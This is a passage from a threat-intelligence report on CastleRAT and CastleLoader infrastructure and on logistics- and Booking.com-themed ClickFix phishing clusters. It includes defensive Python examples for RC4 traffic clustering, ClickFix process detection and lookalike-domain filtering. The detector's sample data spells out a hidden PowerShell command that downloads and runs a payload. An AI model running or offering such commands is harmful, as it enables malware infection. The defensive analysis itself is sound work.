          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1d32a10bffa6e0b7534ef42d38aba5855ac9b6537.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="938" />
        </p>
        <p><em><strong>Figure 3</strong>: Victim communication with multiple CastleRAT C2 servers simultaneously (Source: Recorded Future)</em></p>
        <p>Notably, some CastleRAT samples <a href="https://tria.ge/250918-qj9pha1nz4/behavioral1">exhibit</a> behavior distinct from other observed variants by incorporating an elaborate handshake sequence and redundancy in their C2 communications. In these cases, the client’s initial request to the C2 server (for example, <em>77[.]238[.]241[.]203:443</em>) ends with the bytes <code>07 00 00 00</code> instead of the usual <code>01 00 00 00</code>, and the server responds with trailing bytes <code>9e ff 74 70</code> before closing the connection. A similar exchange occurs with <em>5[.]35[.]44[.]176</em>, after which the client reconnects to the first C2, transmitting only an encrypted sixteen-byte RC4 key and receiving trailing bytes <code>01 00 00 00</code> in response. The client then repeats this process with the second C2, sending <code>01 00 00 00</code> and receiving only the encrypted sixteen-byte RC4 key in return. This pattern suggests the use of additional handshake stages and dual-C2 redundancy mechanisms not seen in all CastleRAT samples.</p>
        <h4>Clustering by RC4 Key</h4>
        <p>Analysis of CastleRAT infrastructure identified multiple clusters of IP addresses grouped by hard-coded RC4 encryption keys (see <strong>Figure 4</strong>). While each RC4 key forms a distinct cluster, all clusters exhibit some degree of overlap through shared keys, suggesting a deliberate or coordinated relationship rather than a coincidental overlap. This interconnected structure suggests a shared tooling or deployment framework underpinning both CastleRAT and CastleLoader operations. Although this does not conclusively establish single-threat actor control, the degree of overlap implies a common developer or operator ecosystem rather than independent, uncoordinated usage of the malware.</p>
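        <p>An added example, not code from the report or from the malware: an analyst-side triage script that applies the two observations above, classifying a captured CastleRAT request by its four-byte trailer and grouping C2 addresses by which known RC4 key decrypts their traffic. It assumes the trailer is sent in clear and everything before it is the RC4-protected body, and it uses a printable-text heuristic to judge a decryption; the only key taken from the report is “NanuchkaUpyachka”, the other keys and the sample flows on documentation IPs are constructed.</p>
```python
from collections import defaultdict


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# The first key is the one reported for a CastleRAT C-variant cluster; the others are
# constructed placeholders standing in for further hard-coded sixteen-byte keys.
KNOWN_KEYS = [b"NanuchkaUpyachka", b"PLACEHOLDER-KEY1", b"PLACEHOLDER-KEY2"]
assert all(len(k) == 16 for k in KNOWN_KEYS)

# Trailer values described in the report: 01 00 00 00 for the common handshake,
# 07 00 00 00 for the extended dual-C2 handshake.
TRAILERS = {b"\x01\x00\x00\x00": "standard", b"\x07\x00\x00\x00": "extended"}


def classify_trailer(payload: bytes) -> str:
    """Label a client request by its final four bytes."""
    return TRAILERS.get(payload[-4:], "unknown")


def plausibility(plaintext: bytes) -> float:
    """Fraction of printable ASCII. Assumption: the RC4-protected body carries mostly
    text (such as the geolocation details the RAT collects), so a correct key yields
    a high ratio while a wrong key yields keystream-like noise."""
    if not plaintext:
        return 0.0
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in plaintext)
    return printable / len(plaintext)


def identify_key(payload: bytes, keys=KNOWN_KEYS, threshold: float = 0.9):
    """Return the known key that decrypts the body to plausible text, or None.
    Assumption: the 4-byte trailer is cleartext and precedes nothing else."""
    body = payload[:-4]
    best = None
    for key in keys:
        score = plausibility(rc4(key, body))
        if score >= threshold and (best is None or score > best[1]):
            best = (key, score)
    return best[0] if best else None


def cluster_by_key(flows, keys=KNOWN_KEYS):
    """flows: iterable of (c2_ip, request_payload). Returns {key: set(ips)} for flows
    whose key could be identified, i.e. the per-key clusters from the report."""
    clusters = defaultdict(set)
    for ip, payload in flows:
        key = identify_key(payload, keys)
        if key is not None:
            clusters[key].add(ip)
    return dict(clusters)


def overlapping_ips(clusters):
    """IPs observed under more than one key: the cross-cluster overlap worth a closer look."""
    keys_per_ip = defaultdict(set)
    for key, ips in clusters.items():
        for ip in ips:
            keys_per_ip[ip].add(key)
    return {ip for ip, ks in keys_per_ip.items() if len(ks) > 1}


def make_flow(key: bytes, ip: str, text: bytes, trailer: bytes = b"\x01\x00\x00\x00"):
    """Construct a sample request the way the assumed protocol lays it out: RC4 body + clear trailer."""
    return (ip, rc4(key, text) + trailer)


# Constructed sample flows. The two 104./144. addresses are the report's C2s that share
# "NanuchkaUpyachka"; 192.0.2.x are documentation addresses invented for the overlap case.
SAMPLE_FLOWS = [
    make_flow(b"NanuchkaUpyachka", "104.225.129.171", b'{"country":"US","isp":"example-isp"}'),
    make_flow(b"NanuchkaUpyachka", "144.208.126.50", b'{"country":"US","isp":"example-isp"}'),
    make_flow(b"NanuchkaUpyachka", "192.0.2.10", b"hostname=WKS01;user=j.doe"),
    make_flow(b"PLACEHOLDER-KEY1", "192.0.2.10", b"hostname=WKS02;user=a.roe", b"\x07\x00\x00\x00"),
    make_flow(b"PLACEHOLDER-KEY1", "192.0.2.20", b"hostname=WKS03;user=m.poe"),
]

if __name__ == "__main__":
    found = cluster_by_key(SAMPLE_FLOWS)
    for key, ips in found.items():
        print(key.decode(), sorted(ips))
    print("overlap:", sorted(overlapping_ips(found)))
```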
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1be5107977c3267366984e116b333887daf9703ac.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1390" />
        </p>
        <p><em><strong>Figure 4</strong>: RC4 key clusters (Source: Recorded Future)</em></p>
        <h3>CastleLoader</h3>
        <h4>Infrastructure Analysis</h4>
        <p>Insikt Group identified additional C2 infrastructure associated with CastleLoader. The related domains and IP addresses are listed in <strong>Appendix A</strong>. Notably, several domains share the same WHOIS start of authority (SOA) email address, indicating they were likely registered by the same threat actor.</p>
        <p>Notably, the domain <em>oldspicenotsogood[.]shop</em> is linked to several other domains listed in <strong>Appendix B</strong>, which are likely used for malicious activity, including impersonation of legitimate brands such as DocuSign, Norton, and TradingView. Additionally, at least one of these domains, <em>testdomain123123[.]shop</em>, has been identified as a LummaC2 C2 server.</p>
        <h3>Activity Clusters</h3>
        <p>Insikt Group identified four distinct clusters of activity associated with the deployment of CastleLoader (see <strong>Figure 4</strong>). The first cluster, tracked as TAG-160, appears to be highly targeted toward the logistics sector, employing techniques specifically tailored to this industry. In contrast, the second cluster, tracked as TAG-161, exhibits a broader targeting scope and leverages Booking.com-themed lures. The third cluster likewise impersonates Booking.com but shows no overlap with TAG-161. The fourth cluster relies on malvertising campaigns and fake software update mechanisms.</p>
        <p>Based on Insikt Group’s assessment, these clusters are associated with distinct users deploying CastleLoader, as no overlap in infrastructure or tactics was observed between them. At this stage, the exact nature of the relationship between these users and GrayBravo (formerly tracked as TAG-150) remains unclear. Insikt Group further assesses that additional CastleLoader users are likely active, supported by proprietary Recorded Future intelligence and the large number of identified panels, which collectively suggest a broader user base.</p>
        <h4>Cluster 1: Logistics Sector-Focused Activity Tracked as TAG-160</h4>
        <p>Cluster 1, tracked as TAG-160, has been active since at least March 2025 and remains operational at the time of analysis. TAG-160 employs infrastructure that impersonates logistics companies and leverages logistics-themed phishing lures, among other tactics. It uses ClickFix techniques to deliver CastleLoader as well as additional payloads. Evidence suggests the cluster operates a mix of threat actor-controlled and compromised infrastructure. Additionally, it has been observed exploiting weaknesses in target organizations’ systems, such as spoofing legitimate email senders from logistics companies to enhance the credibility of its phishing campaigns. In addition, Cluster 1 uses access to the legitimate freight-matching platforms DAT Freight &amp; Analytics and Loadlink Technologies for multiple purposes.</p>
        <h5>Attack Flow</h5>
        <p>Cluster 1 employs spearphishing campaigns in combination with ClickFix techniques to compromise victims. <strong>Figure 5</strong> illustrates a high-level overview of the phishing attack flow.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a3fbdc837ac260e056768d86ba670ab247081c07.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="723" />
        </p>
        <p><em><strong>Figure 5</strong>: ClickFix attack flow used by TAG-160 (Source: Recorded Future)</em></p>
        <p>The attack chain typically begins with either a spoofed legitimate email address (for example, <em>no-reply[@]englandlogistics[.]com</em>) or a threat actor-controlled address associated with a typosquatted domain (for example, <em>englandloglstics[.]com</em>), impersonating companies such as England Logistics. Historically, such emails have been sent to US-based carriers, presenting fraudulent freight quotes that appear to originate from England Logistics. However, other organizations likely to be influenced by logistics-themed lures cannot be ruled out as potential targets.</p>
        <p>The emails prompt recipients to click a link to view a supposed rate confirmation for a shipment, instructing them to copy and paste the link into a browser if it does not open directly. The threat actors often add a sense of urgency, warning that the link will soon expire. Clicking the link leads victims to a landing page designed to harvest information (see <strong>Figure 6</strong>). Insikt Group has <a href="https://www.urlquery.net/report/99d39dd3-bfd6-44fa-9275-e7d7e7a22ac9">observed</a> multiple variations of these landing pages.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_155561bfb43adf9b6751ba6800e35c480f96c98ed.png?width=750&amp;format=png&amp;optimize=medium" width="966" height="1052" />
        </p>
        <p><em><strong>Figure 6</strong>: “dpeforms” lure used by TAG-160 (Source: Recorded Future)</em></p>
        <p>Notably, although Insikt Group was unable to retrieve the landing page associated with another Cluster 1–linked domain, <em>loadstracking[.]com</em>, indexed Google search results indicate that the domain likely hosted the same or a similar page as observed in <strong>Figure 7</strong>. DPE likely stands for “Direct Port Entry,” which is a system designed for exporters, allowing goods to be directly moved from their premises to the port and loaded onto the vessel for export without being transferred to a container freight station.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a43f26ffef45a6c789ad537c5e1232e719f5353f.png?width=750&amp;format=png&amp;optimize=medium" width="743" height="147" />
        </p>
        <p><em><strong>Figure 7</strong>: “dpeforms” page found in Google Search (Source: Recorded Future)</em></p>
        <p>After submitting their information, the victim is presented with ClickFix-style instructions, guiding them through a series of steps purportedly required to complete a document signing process (see <strong>Figure 8</strong>). By incorporating the DocuSign logo, the threat actors likely aim to enhance the perceived legitimacy of the page and further deceive the victim.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a29b8734977ac6a714e89ce057ad87cfbcb12c81.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="633" />
        </p>
        <p><em><strong>Figure 8</strong>: DocuSign-themed ClickFix used by TAG-160 (Source: Recorded Future)</em></p>
        <p>By following the instructions shown in <strong>Figure 8</strong>, the victim unknowingly executes the command illustrated in <strong>Figure 9</strong>. This command runs silently in the background, downloads and extracts a payload archive from a remote IP address, executes a Python-based malware using <code>pythonw.exe</code>, and displays a decoy message to appear legitimate. Observed payloads delivered through this method include CastleLoader, HijackLoader, Rhadamanthys, and zgRAT.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_194d883d95935fed30bcd62de8a8aa760b4f8dd9d.png?width=750&amp;format=png&amp;optimize=medium" width="1262" height="206" />
        </p>
        <p><em><strong>Figure 9</strong>: ClickFix command (Source: Recorded Future)</em></p>
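        <p>An added detection example, not code from the report: a scorer for process-creation events (Sysmon Event ID 1 style fields) that looks for the ClickFix chain just described, a script host launched from the Run dialog with a hidden window, an archive fetched from a bare IP address, extraction, and a <code>pythonw.exe</code> launch from an untrusted location. The exact one-liner in Figure 9 is not reproduced; the sample events, the documentation IP and the assumption that the decoy is shown with <code>msg *</code> are constructed, and the trusted Python roots are an assumption to tune per estate.</p>
```python
import re
from pathlib import PureWindowsPath

# Command-line indicators for the ClickFix chain described in the report. The decoy
# message is assumed to be raised with `msg *` or a MessageBox call (assumption).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bare_ip_download": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b", re.I),
    "archive_extract": re.compile(r"Expand-Archive|tar\s+-x|\.zip\b", re.I),
    "pythonw_launch": re.compile(r"pythonw\.exe", re.I),
    "decoy_message": re.compile(r"\bmsg\s+\*|MessageBox", re.I),
}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Locations from which a pythonw.exe launch is expected (assumption; tune per estate).
TRUSTED_PYTHON_ROOTS = (
    r"c:\program files",
    r"c:\program files (x86)",
    r"\appdata\local\programs\python",
)


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def analyze(event: dict) -> dict:
    """event: {'parent', 'image', 'cmdline'}. Returns a verdict with the reasons behind it."""
    image = basename(event["image"])
    image_path = event["image"].lower()
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]
    if image == "pythonw.exe":
        # The interpreter's own command line always names pythonw.exe; only an
        # interpreter running from an untrusted location (such as %TEMP%) counts.
        hits = [h for h in hits if h != "pythonw_launch"]
        if not any(root in image_path for root in TRUSTED_PYTHON_ROOTS):
            hits.append("pythonw_outside_trusted_root")
    # ClickFix victims paste the command into Win+R, so explorer.exe is the parent of the script host.
    run_dialog = basename(event["parent"]) == "explorer.exe" and image in SCRIPT_HOSTS
    if (run_dialog and len(hits) >= 2) or "pythonw_outside_trusted_root" in hits:
        verdict = "alert"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "reasons": hits, "run_dialog": run_dialog}


def triage(events) -> list:
    """Map each event to (image name, verdict) for a quick overview."""
    return [(basename(e["image"]), analyze(e)["verdict"]) for e in events]


# Constructed sample events; 198.51.100.10 is a documentation address, no payload exists.
SAMPLE_EVENTS = [
    {  # the pasted ClickFix command as the report describes it
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": (
            r'powershell -w hidden -c "curl http://198.51.100.10/p.zip -o $env:TEMP\p.zip; '
            r"Expand-Archive $env:TEMP\p.zip $env:TEMP\p; "
            r"Start-Process $env:TEMP\p\pythonw.exe $env:TEMP\p\m.py; "
            r'msg * Document verified"'
        ),
    },
    {  # the resulting interpreter launch from the extracted archive
        "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "image": r"C:\Users\victim\AppData\Local\Temp\p\pythonw.exe",
        "cmdline": r'"C:\Users\victim\AppData\Local\Temp\p\pythonw.exe" C:\Users\victim\AppData\Local\Temp\p\m.py',
    },
    {  # benign: a developer starting a GUI script with an installed interpreter
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Users\dev\AppData\Local\Programs\Python\Python312\pythonw.exe",
        "cmdline": r'"C:\Users\dev\AppData\Local\Programs\Python\Python312\pythonw.exe" app.py',
    },
    {  # benign: an admin opening PowerShell from Win+R for an ordinary command
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -NoProfile -Command Get-Date",
    },
]

if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_EVENTS):
        print(f"{name:16} {verdict}")
```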
        <h5>Use of Compromised Infrastructure</h5>
        <p>As part of TAG-160’s phishing infrastructure, the threat actors appear to rely not only on spoofed email addresses, as previously described, but also on compromised systems. Insikt Group has observed indications that the threat actors likely leveraged compromised infrastructure to send phishing emails. For example, at least one domain used to distribute phishing messages contained malware logs from infostealers such as LummaC2, including stolen credentials for a Namecheap account.</p>
        <h5>Infrastructure Analysis</h5>
        <p>Insikt Group identified a large number of domains and IP addresses associated with Cluster 1, all of which either impersonate logistics companies or align with logistics-themed phishing lures (see <strong>Appendix C</strong>). Notably, the majority of these domains include the subdomain <em>apps[.]englandlogistics</em> (for example, <em>apps[.]englandlogistics[.]rateconfirmations[.]com</em>), suggesting they were likely designed to impersonate England Logistics, as outlined in the previous section. One domain, <em>loadstrucking[.]com</em>, instead featured the subdomain <em>app[.]england</em>, following a similar naming pattern.</p>
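        <p>An added example, not code from the report: a mail- and URL-filter check for the two naming tricks described above, a protected brand placed in the subdomain of an unrelated registrable domain (<em>apps[.]englandlogistics[.]rateconfirmations[.]com</em>, <em>app[.]england[.]loadstrucking[.]com</em>) and a typosquat of the brand itself (<em>englandloglstics[.]com</em>). The brand list is an assumption for a carrier dealing with England Logistics, and the registrable domain is taken as the last two labels; a production filter would use the Public Suffix List.</p>
```python
from urllib.parse import urlparse

# Brands to protect and their legitimate registrable domain (assumption: a carrier that
# regularly receives mail from England Logistics; a real deployment loads its own partner list).
PROTECTED = {"englandlogistics": "englandlogistics.com"}
# Subdomain labels that count as borrowing the brand; "app.england" was seen on a lookalike.
BRAND_TOKENS = ("englandlogistics", "england")


def registrable_domain(host: str) -> str:
    """Assumption: the registrable domain is the last two labels. Use the Public Suffix
    List in production so that names such as example.co.uk are split correctly."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch single-character typosquats of the brand label."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def host_of(sender_or_url: str) -> str:
    """Accept an e-mail address, a URL or a bare host name and return the host."""
    s = sender_or_url.strip()
    if "@" in s:
        return s.rsplit("@", 1)[1].lower()
    if "://" in s:
        return (urlparse(s).hostname or "").lower()
    return s.lower()


def classify(sender_or_url: str, max_edits: int = 2) -> tuple:
    """Return (verdict, brand). Verdicts: legitimate, typosquat, brand_in_subdomain, no_match."""
    host = host_of(sender_or_url)
    reg = registrable_domain(host)
    subdomain = host[: len(host) - len(reg)].rstrip(".")
    second_level = reg.split(".")[0]
    for brand, legit in PROTECTED.items():
        if reg == legit:
            return ("legitimate", brand)
        distance = levenshtein(second_level, brand)
        if 0 < distance <= max_edits:
            return ("typosquat", brand)
    for token in BRAND_TOKENS:
        if any(label.startswith(token) for label in subdomain.split(".") if label):
            return ("brand_in_subdomain", token)
    return ("no_match", None)


# Constructed inputs; the lookalike patterns follow the report, the addresses are made up.
SAMPLE_INPUTS = [
    "no-reply@englandlogistics.com",
    "https://apps.englandlogistics.rateconfirmations.com/rate-confirmation",
    "billing@englandloglstics.com",
    "app.england.loadstrucking.com",
    "orders@example.com",
]

if __name__ == "__main__":
    for item in SAMPLE_INPUTS:
        print(f"{item:60} {classify(item)}")
```
        <p>A “legitimate” result only means the registrable domain matches; the spoofed <em>no-reply[@]englandlogistics[.]com</em> sender described earlier passes this check, so the domain test has to sit alongside SPF, DKIM, and DMARC evaluation rather than replace it.</p>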
        <p>Insikt Group <a href="https://urlscan.io/result/0197f23f-1845-74dd-90af-539a30c3aa3e">identified</a> the subdomain <em>files[.]loadstracking[.]com</em>, hosted on the IP address <em>89[.]185[.]84[.]211</em> between July 6 and September 26, 2025, which was serving the file <code>newtag.zip</code> (SHA256: d87ccd5a2911e46a1efbc0ef0cfe095f136de98df055eacd1c82de76ae6fecec). The ZIP archive contained a legitimate WinGup executable for Notepad++ that sideloaded a malicious libcurl.dll identified as DonutLoader. This loader subsequently retrieved three intermediate payloads from the legitimate subdomain <em>files-accl[.]zohoexternal[.]com</em>.</p>
        <h5>Domain Re-Registration Tactic</h5>
        <p>Similarly, Insikt Group assesses that to further enhance the perceived legitimacy of their infrastructure, the threat actor deliberately re-registered domains previously associated with legitimate logistics companies, in addition to using typosquatted domains. <strong>Figure 10</strong> provides two examples of this activity.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1767d51180ebfc148db82f1ef427279295a0b4538.png?width=750&amp;format=png&amp;optimize=medium" width="1082" height="206" />
            </div>
          </div>
        </div>
        <p><em><strong>Figure 10</strong>: Re-registration of logistics-themed domains (Source: Recorded Future)</em></p>
        <p>Notably, the domain <em>cdlfreightlogistics[.]com</em> appears to have previously hosted a website associated with the legitimate company CDL Freight Logistics, Inc. in 2023. Similarly, the domain <em>hometownlogisticsllc[.]com</em> hosted a website for Hometown Logistics LLC in 2021 (see <strong>Figure 11</strong>).</p>
        <p><em><strong>Figure 11</strong>: Registration of domains previously owned by legitimate logistics companies (Source: Recorded Future)</em></p>
        <h5>Public Complaints and Suspected Access to DAT and Loadlink</h5>
        <p>Some of the domains listed in the <strong>Infrastructure Analysis</strong> section have been publicly referenced in connection with suspicious or fraudulent activity. For example, the email address <em>david[@]cdlfreightlogistics[.]com</em>, associated with the domain <em>cdlfreightlogistics[.]com</em>, first appeared on August 26, 2025, in a public Telegram channel named “current_hot_loads”, a forum used by individuals and companies in the logistics industry to share information such as market rates. In that instance, a user asked other members whether an email was legitimate (see <strong>Figure 12</strong>). Several respondents indicated they did not believe it to be legitimate.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1416daca3dfc49f61ff3c646109de20af7819dbea.png?width=750&amp;format=png&amp;optimize=medium" width="800" height="413" />
        </p>
        <p><em><strong>Figure 12:</strong></em> <em>Example phishing email sent by TAG-160 (Source: Recorded Future)</em></p>
        <p>While Insikt Group was unable to obtain additional details about the email exchange linked to the email posted in the channel, the available text suggests that the threat actor initially contacted potential victims without including malicious content, likely aiming to establish rapport before sending follow-up messages containing malicious links.</p>
        <p>In another instance, Insikt Group identified a post from an employee of a legitimate logistics company based in Rhode Island, USA, describing an incident in which a threat actor created accounts impersonating their company on DAT Freight &amp; Analytics (<em>dat.com</em>) and Loadlink Technologies (<em>loadlink.ca</em>), both platforms operating in the freight matching industry (see <strong>Figure 13</strong>). The fraudulent registrations used fake company information, including the email address <em>paul[@]mrlogsol[.]ca</em>, which is associated with Cluster 1–linked infrastructure. Notably, in line with Cluster 1’s typical patterns, the email addresses used in these operations often consist of only a first name (for example, Paul). The employee reported having contacted both DAT and Loadlink to alert them to the fraudulent activity.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_197d2097858ae7d6502840ec86c8d25d764e75569.png?width=750&amp;format=png&amp;optimize=medium" width="890" height="788" />
        </p>
        <p><em><strong>Figure 13</strong>: Complaint on Facebook written by an individual targeted by TAG-160 (Source: Recorded Future)</em></p>
        <p>Based on a confirmation email from one of the platforms’ abuse reporting teams, which the employee shared on Facebook as well, it appears that the threat actor was also using a Gmail address impersonating their company, <em>maritza[.]rmlogisticsol[@]gmail[.]com</em> (see <strong>Figure 14</strong>).</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_101b71323b17bacddaaeb2ba1f64855fb611f5936.png?width=750&amp;format=png&amp;optimize=medium" width="1128" height="988" />
        </p>
        <p><em><strong>Figure 14</strong>: Email shared by an individual targeted by TAG-160 (Source: Recorded Future)</em></p>
        <p>Threat actors associated with Cluster 1 appear to have access to fraudulent DAT and Loadlink accounts, as evidenced by a user report of fraudulent activity on Facebook (see <strong>Figure 13</strong>) and further supported by additional profiles identified by Insikt Group (see <strong>Figure 15</strong>). Furthermore, Insikt Group assesses that the threat actors may also have access to compromised legitimate accounts, given the substantial volume of stolen credentials associated with the domains <em>dat[.]com</em> and <em>loadlink[.]ca</em> observed in Recorded Future Identity Intelligence.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1eb360521afb816016f9bf42b54a29065e55cd924.png?width=750&amp;format=png&amp;optimize=medium" width="1280" height="445" />
        </p>
        <p><em><strong>Figure 15</strong>: Account information linked to TAG-160 (Source: Recorded Future)</em></p>
        <p>Access to platforms like DAT Freight &amp; Analytics and Loadlink Technologies not only enables the threat actors to enhance the appearance of legitimacy, allowing them to maintain plausible profiles should potential victims attempt verification, but also provides opportunities to gather contact information for prospective targets and obtain additional contextual data, such as details on specific loads, dates and times, documents, or related materials, which can then be repurposed as spearphishing lures. In addition, although not verified in this specific case, the threat actors may also post fraudulent load listings containing malicious content, potentially resulting in malware infections.</p>
        <h5>Possible Overlap with September 2024 Campaign</h5>
        <p>In September 2024, Proofpoint <a href="https://www.proofpoint.com/us/blog/threat-insight/security-brief-actor-uses-compromised-accounts-customized-social-engineering">reported</a> on an unattributed activity cluster observed since at least May 2024. The threat actors targeted transportation and logistics companies in North America to distribute various malware families, including LummaC2, StealC, and NetSupport RAT, as well as remote monitoring and management (RMM) tools such as SimpleHelp, PDQ Connect, Fleetdeck, and ScreenConnect. The campaigns employed several techniques: The threat actors compromised legitimate email accounts belonging to transportation and shipping companies, injecting malicious content into existing email threads to enhance credibility. They also used compromised accounts on DAT Freight &amp; Analytics and Loadlink platforms to post fraudulent load listings containing malicious URLs leading to RMM downloads. Lastly, they launched broader phishing waves that directed recipients to staging web pages hosting RMM installers. Most campaigns involved Google Drive URLs or attached .URL shortcut files that, when executed, used SMB to retrieve an executable from a remote share, leading to malware installation.</p>
        <p>While Insikt Group has not identified direct technical overlaps (for example, shared infrastructure), the similar targeting and partially overlapping tactics, particularly the use of DAT Freight &amp; Analytics and Loadlink, suggest a possible connection between this activity cluster and Cluster 1 (this is a low-confidence assessment).</p>
        <p>Notably, in November 2025, Proofpoint <a href="https://www.proofpoint.com/us/blog/threat-insight/remote-access-real-cargo-cybercriminals-targeting-trucking-and-logistics">reported</a> again on a possibly related activity where cybercriminals targeted trucking and logistics companies using RMM tools to hijack shipments. The attackers lured victims through fake load postings or compromised email threads, delivering malware or RMM software to gain access. This campaign highlights the growing convergence of cyber and physical cargo theft as criminals exploit digital logistics systems.</p>
        <h4>Cluster 2: Matanbuchus and Mailer Tool Activity Tracked as TAG-161</h4>
        <p>Cluster 2, tracked as TAG-161, has been active since at least June 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com and employs ClickFix techniques. It primarily delivers CastleLoader, but Insikt Group has also observed it distributing other payloads, notably Matanbuchus. Evidence indicates that the cluster relies mainly on threat actor-controlled infrastructure. Furthermore, Insikt Group identified previously unreported phishing email management tooling that appears to be used by threat actors linked to Cluster 2.</p>
        <h5>Matanbuchus Activity and Booking.com-Themed Infrastructure</h5>
        <p>Alongside CastleLoader, several Matanbuchus samples were distributed through Booking.com-themed ClickFix campaigns associated with Cluster 2. Notably, Insikt Group had previously reported Matanbuchus activity linked to CastleRAT in an earlier publication, where the Matanbuchus C2 panel was hosted on the adjacent IP address, <em>185[.]39[.]19[.]164</em> (see <strong>Figure 16</strong>).</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1fee0f400f126652867b44778e0424c29d3f6aac1.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
        </p>
        <p><em><strong>Figure 16</strong>: Matanbuchus panel on</em> 185[.]39[.]19[.]164 <em>(Source: Recorded Future)</em></p>
        <p>Matanbuchus is a C-based downloader MaaS available since 2021. One of its primary objectives is secrecy, which is in part fostered by limiting sales to a select number of customers. Currently at version three, it is continually maintained and improved by its creator BelialDemon. <a href="https://app.recordedfuture.com/portal/intelligence-card/edxAL9/overview?organization=uhash:5cJsHMHeSM">BelialDemon</a> offers Matanbuchus 3.0 as a monthly rental service with two pricing tiers based on the communication protocol: $10,000 per month for the <a href="https://app.recordedfuture.com/portal/intelligence-card/0SsNc/overview?organization=uhash:5cJsHMHeSM">HTTPS</a>-based version and $15,000 per month for the DNS-based version.</p>
        <p>Recorded Future Malware Intelligence’s most recent Matanbuchus sample at the time of writing <a href="https://tria.ge/251009-y1lyrsyzcx/behavioral1">communicated</a> with its C2 server at <em>mechiraz[.]com</em>, a domain behind Cloudflare but linked to the IP address <em>5[.]178[.]1[.]8</em> (TRIBEKA-AS, PA; AS211059). This IP address was also associated with the domain <em>nicewk[.]com</em>, previously <a href="https://www.morphisec.com/blog/ransomware-threat-matanbuchus-3-0-maas-levels-up/">reported</a> by Morphisec. Historical analysis of the same IP revealed several additional Matanbuchus C2 domains, including <em>galaxioflow[.]com</em> and <em>nimbusvaults[.]com</em>.</p>
        <h5>Additional Booking.com-Themed Infrastructure</h5>
        <p>By analyzing the same /24 CIDR range that hosted the Matanbuchus infrastructure during the period of observed activity, Insikt Group identified additional IP addresses and domains linked to Booking.com-themed ClickFix operations. These network indicators, detailed in <strong>Appendix D</strong>, are tracked by Insikt Group as part of Cluster 2.</p>
        <h5>Phishing Email Management Tooling</h5>
        <p>By analyzing the IP addresses hosting the domains listed in <strong>Appendix D</strong>, Insikt Group identified three that stood out for each hosting three previously unreported websites or management panels operating on high ports. The panels featured the following HTML titles: “Менеджер Email” (translated as “Email Manager”), “Менеджер Редиректов и рассылок” (translated as “Redirect and Mailing Manager”), and “Менеджер Редиректов и Email” (translated as “Redirect and Email Manager”). Based on their visual appearance, technical implementation, and thematic focus, Insikt Group assesses that these websites are used in tandem as part of campaigns specifically targeting Booking.com.</p>
        <h5>Website 1: Redirect and Email Manager (“Менеджер Редиректов и Email”)</h5>
        <p>The first website, <a href="https://urlscan.io/result/0199c9ff-8739-76c3-b84e-a6c997c2e901">hosted</a> on port 56723, serves as a web-based interface for managing bulk redirections and email campaigns (see <strong>Figure 17</strong>). It integrates redirect generation, SMTP configuration, and email distribution capabilities within a single dashboard. The design, terminology, and functionality closely align with those typically observed in malspam or phishing infrastructure management panels.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_136c896a9d13593c36ce2ff3aa14bf18009f7b8df.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" /><em><strong>Figure 17</strong>: Page linked to “Redirect and Email Manager” tool (Source: Recorded Future)</em>
        </p>
